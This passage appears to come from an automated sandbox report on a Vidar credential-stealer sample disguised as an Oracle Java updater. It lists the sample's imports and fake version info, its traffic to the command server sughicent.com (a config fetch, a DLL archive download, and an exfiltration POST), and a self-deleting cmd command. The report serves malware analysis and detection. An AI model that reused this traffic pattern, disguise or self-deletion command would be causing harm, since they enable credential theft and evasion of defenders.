GlobalUnlock, GlobalFree, GetFileSize, CopyFileA, GetPrivateProfileStringA, CreateFileA, DeviceIoControl, InitializeCriticalSection, PulseEvent, GetWindowsDirectoryA, DeleteFileA, GetCurrentDirectoryA, OpenFile, lstrcpyA, lstrcpynA, GetSystemTime, CreateProcessA, FormatMessageA, OutputDebugStringA, InterlockedCompareExchange, GetStartupInfoA, SetFileAttributesA, SetErrorMode
                              USER32.dllGetMenuBarInfo, ReuseDDElParam, UnpackDDElParam, DefFrameProcA, DefMDIChildProcA, TranslateMDISysAccel, MsgWaitForMultipleObjectsEx, GetNextDlgGroupItem, DrawIconEx, CopyImage, GetIconInfo, MonitorFromPoint, RealChildWindowFromPoint, LoadAcceleratorsW, ShowOwnedPopups, NotifyWinEvent, CopyIcon, IsClipboardFormatAvailable, SetWindowContextHelpId, UpdateLayeredWindow, EnumDisplayMonitors, SetLayeredWindowAttributes, InSendMessage, CopyAcceleratorTableA, InvalidateRgn, LoadImageW, ToAsciiEx, CreateAcceleratorTableA, SubtractRect, GetWindowRgn, GetDCEx, CharUpperBuffA, SendNotifyMessageA, MapVirtualKeyExA, InvertRect, SetPropA, GetPropA, GetClassInfoExA, RegisterClassExA, GetComboBoxInfo, SetDlgItemTextA, MessageBeep, EnumClipboardFormats, CreateMenu, SetWindowTextW, GetDlgItemTextA, GetSystemMenu, FindWindowExA, TrackPopupMenuEx, MessageBoxW, LoadIconA, DrawTextW, GetTabbedTextExtentW, GetScrollPos, ShowScrollBar, EnableScrollBar, SetWindowRgn, WindowFromDC, GetAsyncKeyState, LoadMenuW, CreateWindowExW, PostQuitMessage, TrackPopupMenu, GetMenuStringA, SetKeyboardState, CheckMenuItem, SetWindowTextA, DestroyAcceleratorTable, ModifyMenuW, AppendMenuW, GetMenuStringW, WinHelpA, GetAncestor, CallWindowProcA, MapVirtualKeyA, keybd_event, SetMenu, AdjustWindowRectEx, SystemParametersInfoA, GetKeyboardState, ToAscii, GetTopWindow, ChildWindowFromPointEx, IsZoomed, DrawMenuBar, SetMenuDefaultItem, SendMessageW, DrawStateA, FlashWindowEx, CharUpperW, CharLowerW, IsCharLowerW, IsCharUpperW, CharUpperA, CharLowerA, IsCharLowerA, IsCharUpperA, RemoveMenu, GetMenuItemID, IsCharAlphaW, IsCharAlphaNumericW, IsCharAlphaA, IsCharAlphaNumericA, OemToCharBuffA, DefWindowProcW, GetUpdateRect, BeginPaint, EndPaint, GetKeyboardLayout, GetCursor, GetClipboardData, GetTabbedTextExtentA, CharToOemBuffA, GetScrollInfo, GetScrollRange, SetScrollPos, ScrollWindow, GetClassLongA, SetCaretPos, CreateCaret, ShowCaret, FrameRect, DestroyCaret, HideCaret, GrayStringA, LoadCursorA, CharNextA, SetClassLongA, SetWindowLongW, GetWindowLongW, SetWindowsHookExA, RegisterClassA, UnregisterClassA, FindWindowA, RegisterClipboardFormatA, TileWindows, GetDoubleClickTime, ShowWindow, InsertMenuItemA, DispatchMessageW, GetMessageW, GetForegroundWindow, SetClipboardData, GetActiveWindow, UnhookWindowsHookEx, SetForegroundWindow, SetActiveWindow, LockWindowUpdate, ModifyMenuA, GetMenuItemCount, EnableMenuItem, DeleteMenu, GetWindowThreadProcessId, CallNextHookEx, IsRectEmpty, OffsetRect, BeginDeferWindowPos, EndDeferWindowPos, IsIconic, DrawIcon, GetDlgCtrlID, GetSysColorBrush, IntersectRect, SetRect, SetRectEmpty, IsWindowEnabled, RegisterWindowMessageA, DestroyIcon, LoadImageA, GetSystemMetrics, DestroyMenu, SetMenuInfo, GetSubMenu, DefWindowProcA, ValidateRect, SetCursorPos, ReleaseCapture, DrawFrameControl, FillRect, DestroyCursor, SetCursor, ShowCursor, LoadCursorW, SetCapture, GetCapture, KillTimer, SetTimer, BringWindowToTop, MessageBoxA, GetMessageA, SetScrollRange, SetScrollInfo, PostThreadMessageA, ScreenToClient, GetMenu, GetWindow, SetWindowPos, EmptyClipboard, CloseClipboard, DrawTextExA, SetFocus, IsWindowUnicode, DestroyWindow, DrawTextA, OpenClipboard, GetDesktopWindow, PostMessageA, InsertMenuA, LoadBitmapW, InflateRect, GetWindowLongA, GetCursorPos, WindowFromPoint, IsWindowVisible, InvalidateRect, ClientToScreen, AppendMenuA, CreatePopupMenu, EqualRect, PtInRect, GetDlgItem, UpdateWindow, PeekMessageA, TranslateMessage, DispatchMessageA, WaitMessage, LoadIconW, IsChild, GetFocus, GetSysColor, MapDialogRect, GetDialogBaseUnits, GetClientRect, CreateWindowExA, SetWindowLongA, GetWindowRect, MoveWindow, SetParent, RedrawWindow, ReleaseDC, GetDC, DrawFocusRect, TabbedTextOutA, CreateDialogIndirectParamA, EndDialog, ScrollWindowEx, IsDlgButtonChecked, SetDlgItemInt, GetDlgItemInt, CheckRadioButton, CheckDlgButton, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, SendDlgItemMessageA, GetWindowTextLengthA, GetLastActivePopup, GetMessageTime, GetMonitorInfoA, SetWindowPlacement, GetWindowPlacement, GetKeyNameTextA, SetPropW, RemovePropW, GetPropW, CharLowerBuffW, CharLowerBuffA, RemovePropA, AttachThreadInput, TrackMouseEvent, CopyRect, GetParent, IsWindow, GetClassNameA, wsprintfA, GetKeyState, SendMessageA, EnableWindow, CheckMenuRadioItem, EnumChildWindows, LoadAcceleratorsA, TranslateAcceleratorA, LoadStringA, LoadStringW, GetUserObjectInformationW, GetClassNameW, LoadMenuIndirectA, GetNextDlgTabItem, GetClassInfoW, RegisterClassW, GetMenuDefaultItem, IsMenu, GetMenuInfo, IsDialogMessageA, UnionRect, GetMessagePos, GetMenuState, GetMenuItemInfoA, GetWindowTextA, GetWindowDC, MonitorFromWindow, MapWindowPoints, DrawEdge, DeferWindowPos, GetClassInfoA, GetCaretPos, LoadBitmapA, GetProcessWindowStation, GetClipboardOwner, GetQueueStatus, LoadMenuA, CallWindowProcW
                              ADVAPI32.dllRegQueryValueExA, RegOpenKeyExA
                              DescriptionData
                              LegalCopyrightCopyright 2016
                              InternalNameJava ipdate Registration
                              FileVersion2.8.121.13
                              Full Version2.8.121.13
                              CompanyNameOracle Corporation
                              ProductNameJava Platform SE Auto ipdater
                              ProductVersion2.8.121.13
                              FileDescriptionJava ipdate Registration
                              OriginalFilenamejaureg.exe
                              Translation0x0409 0x04b0
                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States
                              TimestampSource PortDest PortSource IPDest IP
                              Mar 22, 2022 23:52:03.317178011 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.433717966 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.433871984 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.434561968 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.550570011 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.552947998 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.553056955 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.648730993 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.765911102 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.765939951 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.765954971 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.765968084 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.765985966 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.766005039 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.766021967 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.766040087 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.766072035 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.766098976 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.766150951 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.766180038 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.766213894 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.766252041 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.882488966 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.882518053 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.882534027 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.882550001 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.882566929 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.882584095 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.882585049 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.882601976 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.882620096 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.882639885 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.882667065 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.882730961 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.882772923 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.882807016 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.882822990 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.882841110 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.882854939 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.882888079 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.882978916 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.883008957 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.883025885 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.883042097 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.883052111 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.883076906 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.883114100 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.883220911 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.883271933 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.883286953 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.883306026 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.883322954 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.883332968 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.883358002 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.883383036 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.998667002 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.998692036 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.998707056 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.998724937 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.998744011 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.998759985 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.998776913 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.998792887 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.998801947 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.998811007 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.998827934 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.998863935 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.998893976 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.998914957 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.998931885 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.998961926 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.998967886 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.998985052 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.998994112 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.999002934 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.999017000 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.999022007 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.999037981 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.999043941 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.999057055 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.999074936 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.999082088 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.999093056 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.999106884 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.999109983 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.999217033 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.999248028 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.999253988 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.999258041 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.999265909 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.999268055 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.999284029 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.999298096 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.999303102 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.999320030 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.999324083 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.999336958 CET80497505.63.155.126192.168.2.5
                              Mar 22, 2022 23:52:03.999366045 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.999394894 CET4975080192.168.2.55.63.155.126
                              Mar 22, 2022 23:52:03.999412060 CET80497505.63.155.126192.168.2.5
                              TimestampSource PortDest PortSource IPDest IP
                              Mar 22, 2022 23:52:03.250364065 CET5393453192.168.2.58.8.8.8
                              Mar 22, 2022 23:52:03.269315958 CET53539348.8.8.8192.168.2.5
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Mar 22, 2022 23:52:03.250364065 CET192.168.2.58.8.8.80x9b94Standard query (0)sughicent.comA (IP address)IN (0x0001)
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Mar 22, 2022 23:52:03.269315958 CET8.8.8.8192.168.2.50x9b94No error (0)sughicent.com5.63.155.126A (IP address)IN (0x0001)
                              • sughicent.com
                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.2.5497505.63.155.12680C:\Users\user\Desktop\b123.exe
                              TimestampkBytes transferredDirectionData
                              Mar 22, 2022 23:52:03.434561968 CET370OUTGET /blaka.php HTTP/1.1
                              Host: sughicent.com
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Mar 22, 2022 23:52:03.552947998 CET370INHTTP/1.1 200 OK
                              Server: nginx/1.14.2
                              Date: Tue, 22 Mar 2022 22:52:03 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Set-Cookie: PHPSESSID=4iac33eqpnj3t9m3k3cj80jcma; path=/
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              Data Raw: 31 63 0d 0a 4d 58 77 78 66 44 46 38 4d 58 77 78 66 44 56 78 52 47 78 51 64 56 5a 4c 62 31 4a 38 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1cMXwxfDF8MXwxfDVxRGxQdVZLb1J80
                              Mar 22, 2022 23:52:03.648730993 CET370OUTGET /request HTTP/1.1
                              Host: sughicent.com
                              Cache-Control: no-cache
                              Cookie: PHPSESSID=4iac33eqpnj3t9m3k3cj80jcma
                              Mar 22, 2022 23:52:03.765911102 CET372INHTTP/1.1 200 OK
                              Server: nginx/1.14.2
                              Date: Tue, 22 Mar 2022 22:52:03 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 1565849
                              Last-Modified: Mon, 21 Feb 2022 16:34:00 GMT
                              Connection: keep-alive
                              ETag: "6213bef8-17e499"
                              Accept-Ranges: bytes
                              Data Raw: 50 4b 03 04 14 00 00 00 08 00 0d 7a 3e 54 c5 85 06 76 05 31 01 00 d0 35 02 00 0c 00 00 00 73 6f 66 74 6f 6b 6e 33 2e 64 6c 6c ec 5b 7d 78 14 45 9a ef 9e 99 84 49 98 64 1a 48 30 3c 04 09 6c f0 b2 8a 18 18 58 12 09 18 20 9d 8d 42 60 d8 81 99 04 c8 07 5f 3a 8e 01 42 9c c6 9c 4f 50 d8 c9 28 b3 cd 78 78 8b 0a b7 ec 0a 0a 1e 77 b2 ae ab a0 39 37 a7 e3 05 49 60 05 f9 d2 45 c5 5d 5c 61 af 71 b2 4b 74 73 31 ba 39 fa de aa ea ee 99 ae ee e4 f4 b9 7f 8f e7 c1 aa a9 fe d5 fb fe de 8f 7a ab aa 1b 2b 97 ef 64 ac 0c c3 d8 e0 af 2c 33 4c 1b 43 fe 94 32 df e2 0f cb 30 99 e3 df c8 64 8e a4 9d 9a d0 c6 2e 3c 35 61 a9 ff fe 07 f3 1a 9b 36 de d7 b4 6a 7d de 9a 55 1b 36 6c 0c e6 ad 5e 97 d7 24 6c c8 bb 7f 43 5e d9 62 4f de fa 8d 6b d7 4d c9 c8 48 cf 57 44 3c d7 90 9f fb a7 8c 7b 16 ab 7f af 0b 1f 2e fe 1c da bb 36 2e 58 74 05 b7 77 2b ed e2 45 dd b8 5d b4 e8 cf d0 1e 5b 4f 9e df be 61 c1 a2 ab 78 ee 82 c5 8f e0 df 8b 16 7d 89 db 7b 16 fd 27 6e 8f 2e 26 6d 05 fe fd a3 fb d7 f8 91 1e d5 04 37 cf 30 0b d9 14 e6 ad d5 f1 15 ea d8 65 66 e2 84 e1 6c e6 70 e6 35 30 70 35 19 7b a6 1d fa 1c 74 ce b0 e8 27 87 fb 16 86 49 65 f0 6f ad 65 dc 16 ec cc b4 5f 5b e0 71 29 99 c4 31 4c a2 25 0d 67 b5 30 87 a0 6d 83 b6 0b 0d 16 5a 98 66 6b 92 6f 73 2c cc 99 71 28 10 16 a6 3e 13 d4 de 60 99 a5 cc e0 7f 0a 64 56 1f 33 e0 d9 60 19 1c 3f 25 b8 ae 39 08 ed 6f 8f 10 8a d8 56 9b 1e 93 c7 30 f5 53 9a d6 ae 0a ae 62 98 f4 32 c5 f6 72 68 df 60 93 61 48 6f e9 14 02 63 98 61 68 a2 45 91 65 a1 71 b1 29 4d 0f 36 ad 61 18 62 6b a1 82 b3 19 70 a5 53 9a d6 35 6c 5c c3 60 db 91 0f 30 47 bb 01 37 8f f9 ff 3f ff a7 3f cb c4 ee fd 2b 27 5a b8 70 4c 18 29 cd cc 62 98 70 2c 68 73 c5 6a 3a f0 68 8d bc ef 65 56 07 1a 25 8d 24 a0 94 50 97 9c 40 b5 eb 51 99 52 f7 28 84 12 1c 2a 00 a5 59 4d 87 4e d0 89 51 26 82 da 58 8a d3 f3 a3 0c 9c ea 9b 75 72 b6 99 c9 69 65 28 42 2b 08 a1 34 55 46 0b c5 66 96 99 94 ad 20 25 21 22 87 88 18 8e 47 e4 7d 05 40 b5 23 41 f4 9b 91 84 28 08 e8 50 10 3b 2c 14 89 0f 46 ea bd b2 d3 82 bc 12 9a 84 7e 32 fe 77 cf b1 9c 9c 5d 02 ff ad 16 33 aa d0 9c 13 41 07 c0 ed 4b e4 ec 95 68 34 34 09 8d 32 5e df 9b 31 f8 f9 56 3d fc 38 78 f0 60 5d 6d 87 ce 63 9b 46 1a a3 b8 d2 42 45 71 e1 48 13 73 fd 34 df 5b 28 be f5 16 43 14 ad 66 82 d6 d2 82 3e 19 a1 17 e4 b6 1a 04 bd 31 c2 44 50 85 95 e2 bd cb 0c 55 45 a3 36 98 a1 96 5a a9 d4 aa 18 61 4c 2d bf 4e ce 2d 26 72 ea 83 3a cb ac 23 f4 79 d5 40 99 f5 19 67 22 a2 51 07 89 99 41 26 eb 20 3f 37 83 14 e8 20 0f 9b 41 38 1d c4 67 02 d9 77 88 4e 8d a9 66 82 b2 74 90 4c 33 48 8e 0e 12 77 9a e8 ba 40 17 93 77 cc 50 17 69 d4 b3 66 a8 4b 34 ea ef cd 50 a5 74 6a 78 cc 50 25 34 ea 76 33 d4 4a 1a 35 cc 0c d5 45 f3 fa 34 d3 04 75 86 ae 73 bf c9 34 ae da 02 7a 19 3d 9d a9 5f 46 d3 8d eb f1 41 33 6d 03 16 4a 5b a5 89 b6 c9 b4 b6 02 4a 5b 99 51 5b 8a 99 b6 52 5a d0 1f 32 f4 82 8a 8c 82 da 33 4c 04 b5 d1 a9 f9 b4 19 ea 08 8d 6a 34 43 1d a6 51 f7 98 a1 5e a6 a9 e7 53 d4 63 0c 45 3d 53 62 29 48 bb 11 f2 7b 87 1e d2 45 43 20 fe 0e 63 44 de 4d da 7e 46 48 7b 08 c2 ea 8a a9 fb 4b
                              Data Ascii: PKz>Tv15softokn3.dll[}xEIdH0<lX B`_:BOP(xxw97I`E]\aqKts19z+d,3LC20d.<5a6j}U6l^$lC^bOkMHWD<{.6.Xtw+E][Oax}{'n.&m70eflp50p5{t'Ieoe_[q)1L%g0mZfkos,q(>`dV3`?%9oV0Sb2rh`aHocahEeq)M6abkpS5l\`0G7??+'ZpL)bp,hsj:heV%$P@QR(*YMNQ&Xurie(B+4UFf %!"G}@#A(P;,F~2w]3AKh442^1V=8x`]mcFBEqHs4[(Cf>1DPUE6ZaL-N-&r:#y@g"QA& ?7 A8gwNftL3Hw@wPifK4PtjxP%4v3J5E4us4z=_FA3mJ[J[Q[RZ23Lj4CQ^ScE=Sb)H{EC cDM~FH{K
                              Mar 22, 2022 23:52:08.932408094 CET2182OUTPOST /blaka.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----2DJEKNYUK6F3E3EK
                              Host: sughicent.com
                              Content-Length: 93933
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Cookie: PHPSESSID=4iac33eqpnj3t9m3k3cj80jcma
                              Mar 22, 2022 23:52:09.865004063 CET2429INHTTP/1.1 200 OK
                              Server: nginx/1.14.2
                              Date: Tue, 22 Mar 2022 22:52:09 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Click to jump to process

                              Target ID:0
                              Start time:23:51:57
                              Start date:22/03/2022
                              Path:C:\Users\user\Desktop\b123.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\b123.exe"
                              Imagebase:0x400000
                              File size:235352 bytes
                              MD5 hash:2E89A7AAE558E9BE86042E2BD7E65803
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000000.00000002.454190962.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.453604770.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.453604770.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low

                              Target ID:2
                              Start time:23:52:10
                              Start date:22/03/2022
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit
                              Imagebase:0x1100000
                              File size:232960 bytes
                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:3
                              Start time:23:52:10
                              Start date:22/03/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff77f440000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:4
                              Start time:23:52:11
                              Start date:22/03/2022
                              Path:C:\Windows\SysWOW64\timeout.exe
                              Wow64 process (32bit):true
                              Commandline:timeout /t 5
                              Imagebase:0x3c0000
                              File size:26112 bytes
                              MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              No disassembly